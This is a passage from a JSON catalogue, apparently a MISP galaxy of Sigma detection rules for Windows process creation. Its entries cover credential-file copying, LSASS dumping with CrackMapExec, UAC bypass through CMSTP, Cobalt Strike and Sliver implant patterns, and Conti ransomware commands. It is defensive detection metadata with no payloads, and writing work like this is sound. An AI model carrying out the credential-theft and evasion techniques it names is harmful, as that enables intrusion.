"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md", - "https://eqllib.readthedocs.io/en/latest/analytics/c4732632-9c1d-4980-9fa8-1d98c93f918e.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bootconf_mod.yml" - ], - "tags": [ - "attack.impact", - "attack.t1490" - ], - "creation_date": "2019/10/24", - "filename": "proc_creation_win_bootconf_mod.yml", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks", - "uuid": "b3d34dc5-2efd-4ae3-845f-8ec14921f449", - "value": "Browser Started with Remote Debugging", - "meta": { - "refs": [ - "https://yoroi.company/wp-content/uploads/2022/05/EternityGroup_report_compressed.pdf", - "https://www.mdsec.co.uk/2022/10/analysing-lastpass-part-1/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browser_remote_debugging.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1185" - ], - "creation_date": "2022/07/27", - "filename": "proc_creation_win_browser_remote_debugging.yml", - "author": "pH-T, Nasreddine Bencherchali (update)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects WMI SquiblyTwo Attack with possible renamed WMI by looking for imphash", - "uuid": "8d63dadf-b91b-4187-87b6-34a1114577ea", - "value": "SquiblyTwo Execution", - "meta": { - "refs": [ - "https://subt0x11.blogspot.ch/2018/04/wmicexe-whitelisting-bypass-hacking.html", - "https://twitter.com/mattifestation/status/986280382042595328", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bypass_squiblytwo.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1047", - "attack.t1220", - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_bypass_squiblytwo.yml", - "author": "Markus Neis, Florian Roth", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", - "uuid": "42333b2c-b425-441c-b70e-99404a17170f", - "value": "Sliver C2 Implant Activity Pattern", - "meta": { - "refs": [ - "https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36", - "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_c2_sliver.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2022/08/25", - "filename": "proc_creation_win_c2_sliver.yml", - "author": "Nasreddine Bencherchali, Florian Roth", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", - "uuid": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", - "value": "F-Secure C3 Load by Rundll32", - "meta": { - "refs": [ - "https://github.com/FSecureLABS/C3/blob/11a081fd3be2aaf2a879f6b6e9a96ecdd24966ef/Src/NodeRelayDll/NodeRelayDll.cpp#L12", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_c3_load_by_rundll32.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ], - "creation_date": "2021/06/02", - "filename": "proc_creation_win_c3_load_by_rundll32.yml", - "author": "Alfie Champion (ajpc500)", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.", - "uuid": "242301bc-f92f-4476-8718-78004a6efd9f", - "value": "Suspicious Load DLL via CertOC.exe", - "meta": { - "refs": [ - "https://twitter.com/sblmsrsn/status/1445758411803480072?s=20", - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2", - "https://lolbas-project.github.io/lolbas/Binaries/Certoc/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certoc_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2021/10/23", - "filename": "proc_creation_win_certoc_execution.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", - "uuid": "6c6d9280-e6d0-4b9d-80ac-254701b64916", - "value": "NTLM Coercion Via Certutil.exe", - "meta": { - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/issues/243", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2022/09/01", - "filename": "proc_creation_win_certutil_ntlm_coercion.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.", - "uuid": "3d3aa6cd-6272-44d6-8afc-7e88dfef7061", - "value": "Change Default File Association", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.001/T1546.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_change_default_file_association.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.001" - ], - "creation_date": "2019/10/21", - "filename": "proc_creation_win_change_default_file_association.yml", - "author": "Timur Zinniatullin, oscd.community", - "level": "low", - "falsepositive": [ - "Admin activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects when a program changes the default file association of any extension to an executable", - "uuid": "ae6f14e6-14de-45b0-9f44-c0986f50dc89", - "value": "Change Default File Association To Executable", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/assoc", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_change_default_file_assoc_susp.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.001" - ], - "creation_date": "2022/06/28", - "filename": "proc_creation_win_change_default_file_assoc_susp.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", - "uuid": "8b0e12da-d3c3-49db-bb4f-256703f380e5", - "value": "Chisel Tunneling Tool Usage", - "meta": { - "refs": [ - "https://github.com/jpillora/chisel/", - "https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chisel_usage.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1090.001" - ], - "creation_date": "2022/09/13", - "filename": "proc_creation_win_chisel_usage.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Some false positives may occure with other tools with similar commandlines" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new chrome instance with custom extensions, as seen being used in 'ChromeLoader'", - "uuid": "27ba3207-dd30-4812-abbf-5d20c57d474e", - "value": "Powershell ChromeLoader Browser Hijacker", - "meta": { - "refs": [ - "https://redcanary.com/blog/chromeloader/", - "https://emkc.org/s/RJjuLa", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chrome_load_extension.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1176" - ], - "creation_date": "2022/06/19", - "filename": "proc_creation_win_chrome_load_extension.yml", - "author": "Aedan Russell, frack113 (sigma)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", - "uuid": "f44800ac-38ec-471f-936e-3fa7d9c53100", - "value": "CleanWipe Usage", - "meta": { - "refs": [ - "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/CleanWipe", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cleanwipe.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2021/12/18", - "filename": "proc_creation_win_cleanwipe.yml", - "author": "Nasreddine Bencherchali @nas_bench", - "level": "high", - "falsepositive": [ - "Legitimate administrative use (Should be investigated either way)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may collect data stored in the clipboard from users copying information within or between applications.", - "uuid": "ddeff553-5233-4ae9-bbab-d64d2bd634be", - "value": "Use of CLIP", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/clip", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1115/T1115.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_clip.yml" - ], - "tags": [ - "attack.collection", - "attack.t1115" - ], - "creation_date": "2021/07/27", - "filename": "proc_creation_win_clip.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of cmdkey to look for cached credentials", - "uuid": "07f8bdc2-c9b3-472a-9817-5a670b872f53", - "value": "Cmdkey Cached Credentials Recon", - "meta": { - "refs": [ - "https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation", - "https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.005" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_cmdkey_recon.yml", - "author": "jmallette, Florian Roth, Nasreddine Bencherchali (update)", - "level": "high", - "falsepositive": [ - "Legitimate administrative tasks" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may delete files left behind by the actions of their intrusion activity.\nMalware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.\nRemoval of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n", - "uuid": "379fa130-190e-4c3f-b7bc-6c8e834485f3", - "value": "Windows Cmd Delete File", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_delete.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.004" - ], - "creation_date": "2022/01/15", - "filename": "proc_creation_win_cmd_delete.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Legitimate scripts" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects possible payload obfuscation via the commandline", - "uuid": "a77c1610-fc73-4019-8e29-0f51efc04a51", - "value": "Suspicious Dosfuscation Character in Commandline", - "meta": { - "refs": [ - "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/dosfuscation-report.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_dosfuscation.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2022/02/15", - "filename": "proc_creation_win_cmd_dosfuscation.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect use of \"/R <\" to read and execute a file via cmd.exe", - "uuid": "00a4bacd-6db4-46d5-9258-a7d5ebff4003", - "value": "Read and Execute a File Via Cmd.exe", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1059.003/T1059.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_read_contents.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.003" - ], - "creation_date": "2022/08/20", - "filename": "proc_creation_win_cmd_read_contents.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Use \">\" to redicrect information in commandline", - "uuid": "4f4eaa9f-5ad4-410c-a4be-bc6132b0175a", - "value": "Redirect Output in CommandLine", - "meta": { - "refs": [ - "https://ss64.com/nt/syntax-redirection.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_redirect.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1082" - ], - "creation_date": "2022/01/22", - "filename": "proc_creation_win_cmd_redirect.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects inline windows shell commands redirecting output via the \">\" symbol to a suspicious location", - "uuid": "8e0bb260-d4b2-4fff-bb8d-3f82118e6892", - "value": "Suspicious CMD Shell Redirect", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218" - ], - "creation_date": "2022/07/12", - "filename": "proc_creation_win_cmd_redirection_susp_folder.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate admin scripts" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)", - "uuid": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", - "value": "CMSTP UAC Bypass via COM Object Access", - "meta": { - "refs": [ - "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", - "https://twitter.com/hFireF0X/status/897640081053364225", - "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" - ], - "creation_date": "2019/07/31", - "filename": "proc_creation_win_cmstp_com_object_access.yml", - "author": "Nik Seetharaman, Christian Burkard", - "level": "high", - "falsepositive": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "uuid": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", - "value": "CMSTP Execution Process Creation", - "meta": { - "refs": [ - "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmstp_execution_by_creation.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" - ], - "creation_date": "2018/07/16", - "filename": "proc_creation_win_cmstp_execution_by_creation.yml", - "author": "Nik Seetharaman", - "level": "high", - "falsepositive": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", - "uuid": "647c7b9e-d784-4fda-b9a0-45c565a7b729", - "value": "Operator Bloopers Cobalt Strike Commands", - "meta": { - "refs": [ - "https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf", - "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", - "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_bloopers_cmd.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.003" - ], - "creation_date": "2022/05/06", - "filename": "proc_creation_win_cobaltstrike_bloopers_cmd.yml", - "author": "_pete_0, TheDFIRReport", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects use of Cobalt Strike module commands accidentally entered in the CMD shell", - "uuid": "4f154fb6-27d1-4813-a759-78b93e0b9c48", - "value": "Operator Bloopers Cobalt Strike Modules", - "meta": { - "refs": [ - "https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf", - "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", - "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_bloopers_modules.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.003" - ], - "creation_date": "2022/05/06", - "filename": "proc_creation_win_cobaltstrike_bloopers_modules.yml", - "author": "_pete_0, TheDFIRReport", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", - "uuid": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", - "value": "CobaltStrike Load by Rundll32", - "meta": { - "refs": [ - "https://www.cobaltstrike.com/help-windows-executable", - "https://redcanary.com/threat-detection-report/", - "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_load_by_rundll32.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ], - "creation_date": "2021/06/01", - "filename": "proc_creation_win_cobaltstrike_load_by_rundll32.yml", - "author": "Wojciech Lesicki", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects process patterns found in Cobalt Strike beacon activity (see reference for more details) and also cases in which a China Chopper like webshell is used to run whoami", - "uuid": "f35c5d71-b489-4e22-a115-f003df287317", - "value": "CobaltStrike Process Patterns", - "meta": { - "refs": [ - "https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/", - "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2021/07/27", - "filename": "proc_creation_win_cobaltstrike_process_patterns.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Other programs that cause these patterns (please report)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "detects the usage of path traversal in cmd.exe indicating possible command/argument confusion/hijacking", - "uuid": "087790e3-3287-436c-bccf-cbd0184a7db1", - "value": "Cmd.exe CommandLine Path Traversal", - "meta": { - "refs": [ - "https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe/", - "https://twitter.com/Oddvarmoe/status/1270633613449723905", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_commandline_path_traversal.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.003" - ], - "creation_date": "2020/06/11", - "filename": "proc_creation_win_commandline_path_traversal.yml", - "author": "xknow @xknow_infosec, Tim Shelton", - "level": "high", - "falsepositive": [ - "(not much) some benign Java tools may product false-positive commandlines for loading libraries" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the attempt to evade or obfuscate the executed command on the CommandLine using bogus path traversal", - "uuid": "1327381e-6ab0-4f38-b583-4c1b8346a56b", - "value": "Command Line Path Traversal Evasion", - "meta": { - "refs": [ - "https://twitter.com/hexacorn/status/1448037865435320323", - "https://twitter.com/Gal_B1t/status/1062971006078345217", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036" - ], - "creation_date": "2021/10/26", - "filename": "proc_creation_win_commandline_path_traversal_evasion.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Google Drive", - "Citrix" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", - "uuid": "435e10e4-992a-4281-96f3-38b11106adde", - "value": "Computer Discovery And Export Via Get-ADComputer Cmdlet", - "meta": { - "refs": [ - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", - "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", - "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_computer_discovery_get_adcomputer.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033" - ], - "creation_date": "2022/11/10", - "filename": "proc_creation_win_computer_discovery_get_adcomputer.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking", - "uuid": "ee5e119b-1f75-4b34-add8-3be976961e39", - "value": "Conhost.exe CommandLine Path Traversal", - "meta": { - "refs": [ - "https://pentestlab.blog/2020/07/06/indirect-command-execution/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conhost_path_traversal.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.003" - ], - "creation_date": "2022/06/14", - "filename": "proc_creation_win_conhost_path_traversal.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Conti ransomware command line ioc", - "uuid": "689308fc-cfba-4f72-9897-796c1dc61487", - "value": "Conti Ransomware Execution", - "meta": { - "refs": [ - "https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/", - "https://twitter.com/VK_Intel/status/1447795359900704769?t=Xz7vaLTvaaCZ5kHoZa6gMw&s=19", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conti_cmd_ransomware.yml" - ], - "tags": [ - "attack.impact", - "attack.s0575", - "attack.t1486" - ], - "creation_date": "2021/10/12", - "filename": "proc_creation_win_conti_cmd_ransomware.yml", - "author": "frack113", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a command used by conti to dump database", - "uuid": "2f47f1fd-0901-466e-a770-3b7092834a1b", - "value": "Conti Backup Database", - "meta": { - "refs": [ - "https://twitter.com/vxunderground/status/1423336151860002816?s=20", - "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", - "https://docs.microsoft.com/en-us/sql/tools/sqlcmd-utility?view=sql-server-ver15", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conti_sqlcmd.yml" - ], - "tags": [ - "attack.collection", - "attack.t1005" - ], - "creation_date": "2021/08/16", - "filename": "proc_creation_win_conti_sqlcmd.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the malicious use of a control panel item", - "uuid": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", - "value": "Control Panel Items", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1196/", - "https://ired.team/offensive-security/code-execution/code-execution-through-control-panel-add-ins", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_control_panel_item.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218.002", - "attack.persistence", - "attack.t1546" - ], - "creation_date": "2020/06/22", - "filename": "proc_creation_win_control_panel_item.yml", - "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Files with well-known filenames (sensitive files with credential data) copying", - "uuid": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", - "value": "Copying Sensitive Files with Credential Data", - "meta": { - "refs": [ - "https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/", - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_copying_sensitive_files_with_credential_data.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003", - "car.2013-07-001", - "attack.s0404" - ], - "creation_date": "2019/10/22", - "filename": "proc_creation_win_copying_sensitive_files_with_credential_data.yml", - "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", - "level": "high", - "falsepositive": [ - "Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of the copy command to copy files with the .dmp extensions from a remote share", - "uuid": "044ba588-dff4-4918-9808-3f95e8160606", - "value": "Copy DMP Files From Share", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_copy_dmp_from_share.yml" - ], - "tags": [ - "attack.credential_access" - ], - "creation_date": "2022/09/27", - "filename": "proc_creation_win_copy_dmp_from_share.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", - "uuid": "f26307d8-14cd-47e3-a26b-4b4769f24af6", - "value": "CrackMapExec Process Patterns", - "meta": { - "refs": [ - "https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crackmapexec_patterns.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2022/03/12", - "filename": "proc_creation_win_crackmapexec_patterns.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud", - "uuid": "df1f26d3-bea7-4700-9ea2-ad3e990cf90e", - "value": "Node Process Executions", - "meta": { - "refs": [ - "https://twitter.com/mttaggart/status/1511804863293784064", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_creative_cloud_node_abuse.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1127", - "attack.t1059.007" - ], - "creation_date": "2022/04/06", - "filename": "proc_creation_win_creative_cloud_node_abuse.yml", - "author": "Max Altgelt", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS", - "uuid": "b7966f4a-b333-455b-8370-8ca53c229762", - "value": "Dropping Of Password Filter DLL", - "meta": { - "refs": [ - "https://pentestlab.blog/2020/02/10/credential-access-password-filter-dll/", - "https://github.com/3gstudent/PasswordFilter/tree/master/PasswordFilter", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_credential_access_via_password_filter.yml" - ], - "tags": [ - 